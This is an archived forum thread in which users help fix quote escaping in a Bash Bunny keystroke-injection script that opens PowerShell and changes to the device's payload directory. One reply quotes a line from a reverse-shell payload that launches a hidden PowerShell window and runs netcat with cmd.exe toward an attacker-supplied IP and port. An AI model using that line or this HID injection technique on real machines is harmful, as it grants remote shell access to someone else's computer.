HamHack Posted February 9, 2018 Posted February 9, 2018 Hey. For some reason my Bash Bunny script gets stuck right after opening up the powershell, but I can't seem to figure out why it's happening. I tried replacing the line right under the 500 delay with a simple string, which made it work, but it won't work as is. This is my script: LED SETUP ATTACKMODE HID STORAGE LED ATTACK Q SET_LANGUAGE gb Q GUI r Q DELAY 150 Q STRING powershell Q ENTER Q DELAY 500 Q STRING cd (gwmi -class win32_volume -filter "label='BashBunny'").Name.Substring(0,2) Q ENTER Q STRING cd payloads/switch1 Q ENTER LED FINISH
GermanNoob Posted February 9, 2018 Posted February 9, 2018 @HamHack, just use some quotes around the string: Q STRING '''cd (gwmi -class win32_volume -filter "label='BashBunny'").Name.Substring(0,2)''' Also think about to use RUN WIN powershell
HamHack Posted February 9, 2018 Author Posted February 9, 2018 @GermanNoob That was definitely an improvement, as it's now being written out, but the string is missing the single quotes around the word BashBunny. It's being written like this: cd (gwmi -class win32_volume -filter "label=BashBunny").Name.Substring(0,2) But I need it to write it like this: cd (gwmi -class win32_volume -filter "label='BashBunny'").Name.Substring(0,2) How do I get it to include the single quotes as well?
HamHack Posted February 9, 2018 Author Posted February 9, 2018 @GermanNoob That was definitely an improvement, as it's now being written out, but the string is missing the single quotes around the word BashBunny. It's being written like this: cd (gwmi -class win32_volume -filter "label=BashBunny").Name.Substring(0,2) But I need it to write it like this: cd (gwmi -class win32_volume -filter "label='BashBunny'").Name.Substring(0,2) How do I get it to include the single quotes as well?
GermanNoob Posted February 9, 2018 Posted February 9, 2018 I'm not a powershell guy to be honest... But why aren't you using the similar commands from other payloads, e.g. RAZ_ReverseShell QUACK STRING powershell -WindowStyle Hidden \".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\nc.exe') -nv ${my_ip} ${my_port} -e cmd.exe\"
HamHack Posted February 9, 2018 Author Posted February 9, 2018 @GermanNoob Well do you know why I can't get the rubber ducky to write single quotes? It freezes every time I try to make it write them. Can I somehow escape them or something?
GermanNoob Posted February 9, 2018 Posted February 9, 2018 I suppose because within the QUACK code there is a single quote used (but that's only a assumption)... You will find a lot of stuff according this topic here: http://wiki.bash-hackers.org/syntax/quoting
PoSHMagiC0de Posted February 9, 2018 Posted February 9, 2018 Issue is with how bash on the Bunny is interpreting your string. An example is echo that line in a Linux bash terminal and you will see the issue. Like replace "quack string" with echo..if you have access to a bash terminal. If not then here is a trick to do. After your QUACK STRING, encapsulate the whole command in double quotes. Once you do that, you will only need to escape "$" and other inner double quotes. Single quotes can be by themselves without needing to escape. Example. Q STRING "cd (gwmi -class win32_volume -filter \"label='BashBunny'\").Name.Substring(0,2)" That should fix your issue without changing your method.
HamHack Posted February 9, 2018 Author Posted February 9, 2018 @PoSHMagiC0de Hallelujah! I guess I'll be sleeping tonight after all. Thank you very much!
Recommended Posts
Archived
This topic is now archived and is closed to further replies.